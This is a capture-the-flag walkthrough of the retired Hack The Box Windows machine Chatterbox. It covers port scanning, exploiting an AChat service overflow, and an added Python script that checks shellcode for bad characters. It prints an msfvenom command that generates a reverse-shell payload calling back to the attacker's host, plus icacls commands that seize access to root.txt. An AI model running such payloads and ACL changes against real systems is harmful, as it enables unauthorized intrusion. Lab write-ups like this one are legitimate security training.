OSCP PREPARATIONS – HTB Chatterbox

Chatterbox is a retired Hack The Box machine running Windows; the goal is to exploit its weaknesses to obtain the user and root flags.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full port Scan

The port scan returned many open ports. We enumerated the well-known ones first, starting with SMB, which gave us nothing; the other common ports offered no entry point either. The ports 9255 and 9256 found by the full scan, however, stand out (consecutive port numbers usually belong to a single application).
Let's run a detailed version/service scan against these two ports.

We see that the "AChat chat system httpd" service is listening, so we make a request to it.

Let's search for exploits related to it.
We found a related exploit, downloaded it, and looked at its content.

This exploit code runs calc.exe on the target.
Let's edit the code and try to run it.

I think it worked, but we can't tell because we can't see the target's screen :) Let's generate reverse-shell shellcode with msfvenom, telling it to avoid the null byte and every byte from 0x80 to 0xff (the exploit's input is treated as Unicode, which is also why the x86/unicode_mixed encoder is used):
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

The command prints a Python buf; we paste it into the exploit in place of the calc.exe shellcode.
Then, with a listener waiting on port 4747, we ran the edited exploit.
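As an added example (not from the original write-up and not the exploit author's code), the script below parses the `-f python` output msfvenom prints, checks it against the bad-character list from the command above, and shows why every byte from 0x80 upward is on that list: the target widens its input from ANSI to UTF-16, so 0x41 survives as 0x41 0x00 but 0x80 does not. The sample buf is constructed (not working shellcode) and Windows-1252 as the target's ANSI code page is an assumption.

```python
"""Added example: sanity-check an msfvenom payload before pasting it into
a Unicode buffer-overflow exploit such as the AChat one used on Chatterbox.
"""
import re

# Bad characters from the msfvenom command: NUL plus every byte >= 0x80.
BAD_CHARS = frozenset([0x00] + list(range(0x80, 0x100)))

# Constructed stand-in for msfvenom's `-f python` output. These 26 bytes are
# not working shellcode; only the text shape matters for the parser.
SAMPLE_MSFVENOM_OUTPUT = r'''
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
'''


def parse_msfvenom_python(text: str) -> bytes:
    """Turn the `buf += ...` lines msfvenom prints into raw bytes, without
    exec()-ing text that came from somewhere else."""
    hex_pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes.fromhex("".join(hex_pairs))


def find_bad_chars(payload: bytes, bad=BAD_CHARS) -> list:
    """Return (offset, byte) for every payload byte on the bad-character
    list; an empty list means the encoder did its job."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def widen(payload: bytes, codepage: str = "cp1252") -> bytes:
    """Approximate the ANSI -> UTF-16LE conversion the target applies to its
    input. Bytes below 0x80 just gain a trailing 0x00 (which the unicode
    encoder plans for); bytes at or above 0x80 become unrelated values.
    Windows-1252 as the target's ANSI code page is an assumption."""
    out = bytearray()
    for b in payload:
        out += bytes([b]).decode(codepage, errors="replace").encode("utf-16-le")
    return bytes(out)


def check_payload(text: str) -> dict:
    """What to know before sending: size, bad characters, and whether every
    byte survives widening as <byte> 0x00."""
    payload = parse_msfvenom_python(text)
    wide = widen(payload)
    survives = all(
        wide[2 * i] == b and wide[2 * i + 1] == 0 for i, b in enumerate(payload)
    )
    return {
        "length": len(payload),
        "bad_chars": find_bad_chars(payload),
        "survives_widening": survives,
    }


if __name__ == "__main__":
    print(check_payload(SAMPLE_MSFVENOM_OUTPUT))
    # Contrast: an unencoded 0x80 becomes 0xAC 0x20 (U+20AC) after widening,
    # so nothing above 0x7f can be sent as-is.
    print(widen(b"\x80").hex())
```

Run it against the real msfvenom output saved to a file; a non-empty bad_chars list or survives_widening == False means the buf will be corrupted in transit and the exploit will fail silently, exactly the "we can't see it" situation above.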

We obtained a shell as chatterbox\alfred.

And this is how we got the user flag.
Interestingly, we could list the Administrator user's files and folders, but we could not read them.

Let's check the permissions right here.

Here we see that we have full control over the Administrator's Desktop folder, but no permission to read root.txt.
Now let's query the permissions there and then grant the Alfred user access to the file. Rewriting a file's ACL only works when the caller owns the file or holds WRITE_DAC on it; on a correctly configured host the second command would fail with access denied.
icacls Desktop -> permission query
icacls root.txt /grant Alfred:(F) -> grant Alfred full control

This way we were able to read the root flag.